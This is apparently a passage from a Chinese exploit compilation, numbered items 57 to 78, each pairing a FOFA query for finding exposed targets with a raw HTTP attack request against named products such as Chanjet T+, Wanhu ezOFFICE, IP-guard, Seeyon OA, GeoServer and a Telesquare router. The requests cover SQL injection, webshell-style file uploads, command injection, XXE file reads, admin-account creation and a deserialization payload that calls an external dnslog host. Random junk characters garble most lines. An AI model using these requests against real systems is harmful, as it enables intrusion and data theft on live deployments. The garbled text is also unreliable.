User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
# N* K3 E, ^5 C5 X$ bContent-Type: application/json
2 |6 L5 x J$ ~7 l% ^# _# p5 T- d# F- \( y* n2 ?! I, |+ A4 M
{
7 r. T# F4 u; a; q( w "storeID":{# w# t- J6 l! y+ H
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",- D: v- ^) Q& ?( T0 w* F2 W
"MethodName":"Start",: l$ @+ U& H( k; h6 e
"ObjectInstance":{
1 x0 g! a$ E# O, F9 T- l "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",. g B9 m* {- G
"StartInfo": {' g! M2 j0 P+ @( Q
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ |+ i- @# ^3 _, e( e( }% X0 i
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"2 x1 z# }: I% Y$ {, k$ c" z
}
; }/ Q& j$ D, t6 l1 [ }, }" V/ u% {. X; z
}
) r- o- _$ P0 |}
# g; e+ k# Q0 r- r/ t1 i
9 f: l' g; b( a& z' ]
. ]! m; u: s/ T( m57. 畅捷通T+ keyEdit.aspx SQL注入1 u' X, ?6 m: M! T! ?7 j
FOFA:app="畅捷通-TPlus"
6 s9 {! X) y' I0 c! i$ C2 rGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
" Y9 z. T6 c U' M! AHost: host7 A9 J9 h. r. t6 A, d3 h
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
1 A1 y2 \- |. X: Q9 Y( T( hAccept-Charset: utf-8. e7 x# n2 ^( x
Accept-Encoding: gzip, deflate
; Z+ z# t5 Z4 e; I- {Connection: close* a# t" H1 y# `9 e) ]5 e
* T/ K9 U$ p$ A# X. W
) ?% F- w7 H4 a9 m, V' \58. 畅捷通T+ KeyInfoList.aspx sql注入
) t6 P z6 h/ D5 X: J1 o# j( kFOFA:app="畅捷通-TPlus"' s2 N& A# Q" ?* c3 b( Z$ f" Z+ }' B
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
) X7 J1 G* A+ h. M- x: z, S( pHost: your-ip) y9 A$ P. d. k/ }
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.369 z7 P4 m6 _# V: F Y L
Accept-Charset: utf-8
9 r6 S0 I5 Y- P# lAccept-Encoding: gzip, deflate$ z ^+ l" j; z7 y' x
Connection: close
7 k) [: m$ P* N0 i2 O* }/ B# r" h6 N! u6 L2 F6 L4 W
. H7 V! u0 N F. H J, Y) y
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行" ~0 z# [/ S: M; I6 A/ C4 }
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"* `- @, m+ f/ d: }- O
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1+ y8 B: X& H% @1 N, _; u& r
Host: 192.168.86.128:9090# r0 q0 l5 L( N7 B! [
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
. o' G2 t$ ]7 h! x2 QConnection: close2 \. s8 M* j! d4 Z9 {7 G5 L
Content-Length: 1669$ B& V ]* i3 I' O, `7 C
Accept: */*
9 n" r9 ?8 M) DAccept-Language: en
: v1 i t9 \) v1 iContent-Type: application/x-www-form-urlencoded
. s% q" Y/ g M7 P5 uAccept-Encoding: gzip( b4 }5 W3 i% T) ~3 p
! p( K6 }7 ^( w8 w6 i7 R& O
PAYLOAD
7 N e E/ |- E. f) i2 S$ D/ e2 n- }4 N, f( E4 C4 e4 n
% O2 B# c! C+ C0 p' ~6 X60. 百卓Smart管理平台 importexport.php SQL注入; ?- W0 D3 o. T( G) j/ j
FOFA:title="Smart管理平台" k# r3 J7 u2 L0 ^' r$ I, s
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
* p. M' s% k. F5 }( @' DHost:3 q. `. F! A! l7 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 A$ D L& Z" w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 B! ?# B# K2 r# I8 r0 b
Accept-Encoding: gzip, deflate p1 o, C; [6 y ]
Accept-Language: zh-CN,zh;q=0.9
* e- K9 F) ?+ w8 P) ]0 ^Connection: close* U" i- Y# e* m$ A3 p: f
* _" b, D3 \- M+ |5 t' r& K- j6 }/ b! X9 X4 ^+ {3 T! Y
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
3 s. p m' ^- @; d# ?FOFA: title="欢迎使用浙大恩特客户资源管理系统"2 }% M1 \+ |4 o
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
8 h0 S+ C8 }: e5 m" r. zHost: x.x.x.x+ H$ l' e$ C% T$ O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# b. t' k" G9 Q \: Z" ?4 dConnection: close2 {2 i$ s% `; m$ f" W
Content-Length: 27
1 l& M" n. H3 ^0 eAccept: */*
# P5 {* [, G: D* nAccept-Encoding: gzip, deflate9 D& m6 M6 m @! H
Accept-Language: en
4 W" w- B1 O- b3 ~* |4 v) WContent-Type: application/x-www-form-urlencoded
) b$ b) `* T v# k
9 n: d' ` \9 p0 N- z0 }( q8uxssX66eqrqtKObcVa0kid98xa
, f( ?1 J) k. z: m5 _+ W8 }6 Y' d) q7 D. ?' f# }6 N2 w$ z n( ^
! R6 d# I8 e6 _; v62. IP-guard WebServer 远程命令执行, W! S8 ?3 i3 E/ s
FOFA:"IP-guard" && icon_hash="2030860561"
5 \. s! w" `- N9 {) \9 O1 s, mGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1. d& B5 l: }$ X; a0 { p
Host: x.x.x.x3 D1 a' ^, k& f X# ?6 x( O
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36( x8 w' p6 {5 c$ Z
Connection: close7 l; }% t- P# b0 G+ a
Accept: */*
- i4 I9 k. _9 v' w; S. S! ?Accept-Language: en, I! S% J. @" l# w! j: p/ x
Accept-Encoding: gzip
; e& T [( @7 P/ l; E4 ?
+ C7 H0 Z0 h, |; p+ j l
* u/ f' y M8 @ K访问
x" P% E9 \! h# N; l2 a- H
* Y7 W5 w. y# s: z1 p1 sGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1$ I* E y/ B, {2 }2 I
Host: x.x.x.x( K& o$ B5 A2 b L& u
$ L6 {7 z$ o$ p! Z
T! o1 s: P$ a( s, {8 h$ H" X63. IP-guard WebServer任意文件读取1 @5 m6 y6 d9 t
IP-guard < 4.82.0609.04 S3 T- \7 v! g1 g/ b
FOFA:icon_hash="2030860561"" z8 }) Y. j6 t4 L* ^0 ]/ q& |, H
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.16 }6 h) K9 `$ K7 d+ O$ F! ~; p. s
Host: your-ip& M3 C4 B1 F. a' Q4 F" [! l1 G& A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% k& p6 W" t& ^( U9 p, r7 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 a$ [5 g8 ]- q+ b
Accept-Encoding: gzip, deflate7 c6 w* V {; H' s
Accept-Language: zh-CN,zh;q=0.9
* L% F% |& l+ i- vConnection: close
. ~7 ^/ D- w z1 I: W. WContent-Type: application/x-www-form-urlencoded& y' D) F3 Z2 ~/ x9 A3 N
6 E/ J$ F/ n& H' @7 {% w9 B
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A8 U+ @7 {+ i$ a6 e. p5 B Z6 n
* B- e' [) A& Y, J9 K# n3 u: D64. 捷诚管理信息系统CWSFinanceCommon SQL注入' |2 C+ C( W8 t% B
FOFA:body="/Scripts/EnjoyMsg.js"
1 j( r% k z0 w- BPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
- k+ W: E* c, `3 dHost: 192.168.86.128:90016 {9 O! N( \8 p5 V j
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.363 s* u R; `$ u: B; o
Connection: close) H% b" X6 ?2 x
Content-Length: 369
! h( Z) d6 N( VAccept: */*
; m+ m8 F* q" i9 Z: |Accept-Language: en/ \6 s% e- i7 [& b' O
Content-Type: text/xml; charset=utf-8" O& w1 S7 _( d) r: ?. T" |
Accept-Encoding: gzip" i' _- {; q4 T# ~& a @! l/ ^
1 @0 ?- W) G' E, _$ V6 T- y2 R y) n<?xml version="1.0" encoding="utf-8"?>6 _: C) W! L5 i/ t" r4 D0 ~2 w7 T
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; t5 M0 @2 y4 ?- T0 c9 L<soap:Body>" K: |7 m! L- v5 f# Z: _
<GetOSpById xmlns="http://tempuri.org/">
1 ]- I% @% n. }) @) d8 m0 ] c <sId>1';waitfor delay '0:0:5'--+</sId>
9 t- t* P1 r* e </GetOSpById>
5 a" d, F" S# n. o! C/ Z" E$ r, E: M6 n% ^ </soap:Body>
$ w# {/ @/ ~- y7 P- J</soap:Envelope>$ w& S+ o# ~# \' J
6 l* _( W, w0 o7 k. k4 F) z/ R8 X& v
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过! _. z3 p, y: V2 |, u- @8 _
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
- R c: U q) [3 w* G响应200即成功创建账号test123456/123456 d' ?3 D4 e) Q2 U( Q
POST /SystemMng.ashx HTTP/1.12 R; ]: g& z$ Y1 D
Host:
- @( \. u" @4 T; X+ y2 {% x. K% kUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
; J( \! y3 }7 f' D q8 _. I9 UAccept-Encoding: gzip, deflate
/ `% i$ V' G( E9 X* f& jAccept: */*1 q% Z, r# @. B
Connection: close
4 O Z( G- a# v8 p9 FAccept-Language: en
: l& J1 `3 |2 c0 q+ x0 q# UContent-Length: 174
% W0 z3 f! x" S7 i0 ~& I6 l0 H; l1 A. M" i: c" k
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators8 p1 }' Y" ?& [" H
8 m, f. g& q7 H2 ^* H3 @7 |1 |; g3 G. x& V" y8 x3 c; d- E9 Q" k# V
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
9 ~, |6 k3 M: B PFOFA:app="万户ezOFFICE协同管理平台"- ^% U/ w" W q
9 E/ |9 z( D9 N p# @8 h! `, L, V. pGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.18 m+ P! Y$ A. X
Host: x.x.x.x
2 ^# U: ^* J, P/ m, m+ P7 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! H& u$ Y' g, KConnection: close1 f2 U, W1 ?' h) `+ Q9 G7 a
Accept: */*0 T5 r X. ]; A5 i9 y3 I, W
Accept-Language: en, y1 N* `2 j, U# ^' O
Accept-Encoding: gzip
* |% ] p, \* n8 {" p) p
2 O1 V2 Y9 F, T$ Z( v. O% E5 M: V9 n5 N5 E) F" E
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在/ B6 ~# j" ^+ S6 F1 H5 ]
" T0 r% M' h% d# ~6 F" {; {67. 万户ezOFFICE wpsservlet任意文件上传8 ]# S5 r; `. j1 c. i. P! n7 n6 \
FOFA:app="万户网络-ezOFFICE"
5 U# @5 h# Q8 AnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
. [) X8 g1 ?* B6 g7 J$ H: _POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
4 H- Q( F8 U. o1 ~9 jHost: x.x.x.x
: o. \: ^" ~' _: zUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.06 p* x/ _9 O2 d1 T: ?* k9 @
Content-Length: 173
7 K& Z; ~% h# i1 V* GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6 U7 E3 T2 c5 h; Y9 s* c" X" wAccept-Encoding: gzip, deflate3 w/ p% ~2 G* p5 T3 {
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
; s0 Z, `9 T' s/ D P: X& @6 W2 AConnection: close: _( q* | T, x& X& k
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
+ \8 L, I/ b" t9 V. XDNT: 1/ P( v0 X2 ^. N9 l: @
Upgrade-Insecure-Requests: 15 N+ C2 A l8 D! p6 F3 t& \, u
! R3 r$ Z# o# n* ?
--ufuadpxathqvxfqnuyuqaozvseiueerp$ o- R9 l( p7 A& W. B: H
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"! ]3 A1 }8 S" g' @: K X9 ~
8 j& L8 \) o& }; g8 g
<% out.print("sasdfghjkj");%>: c* h# a y# q9 X) j
--ufuadpxathqvxfqnuyuqaozvseiueerp--2 S- z( O! v" w1 Z8 v) Q7 j
9 e0 t$ b( ^) r0 C- d; C0 }5 s y: w
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
) ]5 X) `! {+ e' k: q& H; P# M4 C5 U
68. 万户ezOFFICE wf_printnum.jsp SQL注入4 |8 _5 b0 l% ?) k- Y5 X
FOFA:app="万户ezOFFICE协同管理平台"
# s1 O& y9 A4 K* [* M% e. N% VGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+ Z9 T) p! k6 Z0 d* k! Q: t: x% tHost: {{host}}
2 \6 K9 ]+ Z/ t' T% ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
g; w; }; Z* p! e$ Q& A8 NAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
4 d/ ?' `9 e& W/ N7 z) u1 \Accept-Encoding: gzip, deflate( w! I% j7 y6 J
Accept-Language: zh-CN,zh;q=0.9
8 e4 f' P4 x- a, ~; @' g* qConnection: close
7 g- O; V5 [0 ^1 ]
" I; W3 k( W: o1 y/ u# S0 S. i6 [+ X
$ d: k* o" ^ c# N& q0 ^69. 万户 ezOFFICE contract_gd.jsp SQL注入 \- G/ o/ u, e" J7 t# M& F
FOFA:app="万户ezOFFICE协同管理平台"' f! _3 ?/ ]5 t% }2 K: H
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
2 H" @+ F3 S$ A. a0 oHost: your-ip
: e0 P: N6 f: T& p& D: b# x. \: q+ YUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- k/ I9 w, _3 T! b% A6 @* A
Accept-Encoding: gzip, deflate
j/ \8 s. O3 VAccept: */*
: [4 n: n: J4 _# D0 e$ m! l/ wConnection: keep-alive, W* O. ^" t, v
0 r$ `1 ^- j/ Y& l1 v1 r
( h4 u: f! O" I ^% U+ x! B5 \' f70. 万户ezEIP success 命令执行
7 U3 t) c% k, p, h. O9 pFOFA:app="万户网络-ezEIP" h/ @/ A9 j. S. M% a' B- M( j8 f- ~
POST /member/success.aspx HTTP/1.1
: }/ h9 `) {* {2 |5 G# Q, |Host: {{Hostname}}7 O' `' D: q8 x: d: J1 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.368 _" w @! E: i! u
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
4 U: R) x1 }2 c5 {! C: mContent-Type: application/x-www-form-urlencoded
& V$ @* j5 }3 ~: |% x9 { FTYPE: C
# X# u: M3 d- |$ P( CContent-Length: 16702
: F. |, O G6 E& _, T, V& \6 |" M [0 n w
__VIEWSTATE=PAYLOAD0 x: O; H) p# v
' G8 P5 C. n$ v6 u% T& {# _" N% @) v% k$ [
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
( q; A8 `& @ z2 v( ?; c% q# nFOFA:body="PM2项目管理系统BS版增强工具.zip"! e7 x# ?2 ~% {- @, j/ H1 f6 m* g" M7 q
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
; ]& W2 \1 C( h5 x3 D; PHost: x.x.x.xx.x.x.x. E: D, y; B4 h$ z
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
' j9 p+ P- c0 a5 m( z6 l k _Connection: close/ m0 r& |1 @( i+ ?7 h( S2 C! T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 `* T, M0 `# o
Accept-Encoding: gzip, deflate) a9 l3 e- t8 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 r6 S: t& ~; c; p( U9 m
Upgrade-Insecure-Requests: 1, C$ X$ R/ ]0 T) j& x- B
" w% M) i6 N+ t y; X; O# t% V g" ]1 ?9 ]- G
72. 致远OA getAjaxDataServlet XXE
) w2 Z* x: q/ z$ k; ZFOFA:app="致远互联-OA", M0 Z+ w- b8 a( t$ H# P7 d
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1# }- y+ f; z- n7 A; g: E
Host: 192.168.40.131:8099
4 w4 k; Y- r9 qUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36: G9 I; y1 w# }+ d" \
Connection: close2 ?2 X: I: j6 ]* I1 N" @$ c
Content-Length: 583* l0 G4 i9 @2 M; f
Content-Type: application/x-www-form-urlencoded
R% R0 j4 j/ O3 G \; TAccept-Encoding: gzip. v6 b0 ]1 Q+ n; z5 N
: A# _! h5 f( }- |$ ?$ U0 P$ S. yS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E4 t u' Y* x- X+ f' d; h. [% A
) ]# W$ t. k! l ^) e) o2 A9 t5 p% {+ v) G, p
73. GeoServer wms远程代码执行
- _ z3 q: T% B& x3 nFOFA:icon_hash=”97540678”/ ^; s y8 w! a" T
POST /geoserver/wms HTTP/1.1
9 ~7 R3 E4 G; B/ r& @Host:
/ s' z* T! q: X: _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' `8 ]7 w; ~6 D7 m8 `
Content-Length: 1981
& |4 d+ z- @1 p/ L. _3 A/ eAccept-Encoding: gzip, deflate
j V4 _1 ^1 }8 W3 ?5 eConnection: close
5 t: Y& w( g. m( z. ] A" JContent-Type: application/xml
) t* _! p) m8 _1 C$ cSL-CE-SUID: 3
; f9 ?8 S# L+ g7 z% z3 ~ N' |; K
PAYLOAD
! {* w/ ]8 ?) \1 Z+ U. t
$ f. i) d( B, B5 ^+ G' d
" ?& A/ i0 u. {3 p# M [4 v74. 致远M3-server 6_1sp1 反序列化RCE
( q/ i) g3 A' U; zFOFA:title="M3-Server"
7 r: ]5 S% w! ]4 i q+ JPAYLOAD
; R6 P/ F# J8 H/ R! W: o& z# q% t/ z! Q( m: p# J3 _
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE8 f# h4 V$ u7 n. o8 }+ Q7 y
FOFA:app="TELESQUARE-TLR-2005KSH"
$ |! N/ x# F9 i' k1 a1 @GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1: a9 f- X$ M) Q/ p
Host: x.x.x.x i" w( U7 m; C' b( ^6 Y. m ?% [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 l& [; ~2 V0 J0 e1 f
Connection: close
& V8 D! B u6 p# H& S; Y m) OAccept: */*6 i, ~! U* u/ V% T& m- h7 }
Accept-Language: en2 \& J/ K; h, j4 e/ I
Accept-Encoding: gzip
D- B- e7 F0 N1 N+ w. _' A# P1 Q6 a+ ^( V: |
- _/ V" |$ n) }: ?4 F$ qGET /cgi-bin/test28256.txt HTTP/1.1. J! K! f. n) n" X8 U/ D- |0 h) W
Host: x.x.x.x K3 B9 Z8 ]: ^( u3 J- D
" H& r0 l+ j( S+ H. f1 ~+ i. U
4 s. G( j4 ?2 F76. 新开普掌上校园服务管理平台service.action远程命令执行. E) g) K6 F! J3 R3 C" r
FOFA:title="掌上校园服务管理平台"
. ?0 g- E+ q) o5 APOST /service_transport/service.action HTTP/1.1
8 k* R0 x& S: r3 pHost: x.x.x.x( p/ ]: ~0 u/ v' A% y4 P+ ]* p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
4 Y/ a* Y# w9 N& }' YConnection: close
; Z E C1 P3 i5 ?Content-Length: 211 d5 X, [% B) I, \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ G2 C) ?' Q1 D0 q# F$ f* [
Accept-Encoding: gzip, deflate
7 U8 Z* ~; R. M- m+ v N) BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Z, Y3 \* {- B2 j$ M- U" u
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4/ p$ m6 j0 |% H# N8 z
Upgrade-Insecure-Requests: 1
; p8 h, X, o# x/ _+ ]6 u/ W, t* l I, K- m2 n! i
{
3 D8 R( C$ F2 A Y4 Z"command": "GetFZinfo",- z) [% Q% ]) |9 h9 t
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
- [) A) x. i9 {: t/ K) Q7 B+ w ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}", `3 y4 Y1 l1 P& V( {$ l# G1 B
}9 Y. x X; u* ]$ d
0 ?: E4 |) Z! N* L$ ^/ [& \+ D
, k& P% I/ H8 A5 B; {GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
' \- l7 m7 ~* KHost: x.x.x.x
4 t( s; c; M5 X- a' ^9 Z# N( n7 U
6 ^7 o5 }4 j' j0 A
7 K+ v# d% M9 x$ S5 f. v* o- U& h1 g! I$ X4 s1 ]/ U
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
+ w4 ]4 `+ a8 j! I3 ]FOFA:body="F22WEB登陆", n! Y M4 \5 H8 C
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
V0 v M8 y- @6 [Host: x.x.x.x: }+ J |+ j1 { e8 N/ b7 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 D" G+ E9 ~" Y! r' XConnection: close
* R; e% R3 w9 `3 ?; q% sContent-Length: 433" x* I4 \7 O- c$ e" B
Accept: */*( X, Y! H8 x) B# j6 Q
Accept-Encoding: gzip, deflate9 N7 A8 h1 d J: T
Accept-Language: zh-CN,zh;q=0.9" g8 |+ o8 A& M, g
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix/ ?& y6 f( @ P# ?( Y" I' F
' w( C% o1 C2 N- }& V ~------------398jnjVTTlDVXHlE7yYnfwBoix
7 Y+ E9 E$ C3 h5 o* @Content-Disposition: form-data; name="folder"; ]- p7 N( R8 T# ]
5 b4 P. l" H4 j9 Y2 F: ^/upload/udplog, @& z' C! s9 [2 b8 x9 j0 Y
------------398jnjVTTlDVXHlE7yYnfwBoix
' E+ {$ T R0 p0 Q1 ?Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
- _+ d& p: {- W$ J: TContent-Type: application/octet-stream
1 _: F, j. o4 }. E9 u0 Y6 G8 U
2 w1 {; H- ]" t( fhello12345679 T! n2 G% }! S7 j' c$ n
------------398jnjVTTlDVXHlE7yYnfwBoix* d- ]' t7 [1 Z1 d. o3 h
Content-Disposition: form-data; name="Upload"
( K$ b9 V! a1 s p; b
u9 D# {- |% Y: g0 x! DSubmit Query! b9 V$ U. I5 U6 G- }) Y% T- A* g3 N
------------398jnjVTTlDVXHlE7yYnfwBoix--3 t: ]+ c2 [; z4 n; _( X
2 h- f5 g1 e: q" R2 ~0 X! i
' O% b+ }' u) o0 F. E3 J) z78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
: L, A( \& g+ L- \ M$ C) Q# U' o& JFOFA:icon_hash="2001627082"3 Y0 E# h2 a$ |6 n! ^8 ^0 z. V
POST /Platform/System/FileUpload.ashx HTTP/1.1: ?$ d/ r7 C8 p( a
Host: x.x.x.x
# `0 e! V5 M3 C+ m; r5 Y* jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 ]/ A! r, P& b5 O7 n# M+ a) tConnection: close
9 m! m2 m- N& n2 S% _Content-Length: 336" ]- z z, d* O, {
Accept-Encoding: gzip% L2 D7 Q$ ~% R7 H
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
4 w: n( _2 H. A; |/ U) ?, v% s9 e, {1 i6 J1 U- d ?6 ]
------YsOxWxSvj1KyZow1PTsh98fdu6l
' d5 ~7 L% |4 v) `" E' HContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"- D1 L2 ^0 B: ]$ g8 {
Content-Type: image/png
# e: g% Q+ L* i$ E9 \' ]
3 c# `7 A2 m+ RYsOxWxSvj1KyZow1PTsh98fdu6l
" c. _, m+ `9 `------YsOxWxSvj1KyZow1PTsh98fdu6l- |0 L4 }2 F" L: `6 `
Content-Disposition: form-data; name="target"
+ ~3 B2 C% }3 A, `% t# N
, c, w1 G( w3 }& i- ^' ~/Applications/SkillDevelopAndEHS/
. d! |7 Y" p: C, `9 v------YsOxWxSvj1KyZow1PTsh98fdu6l--
( b; {; |6 }7 {- {2 x5 B( U: S0 T
% J/ Z5 V2 k* ^7 d
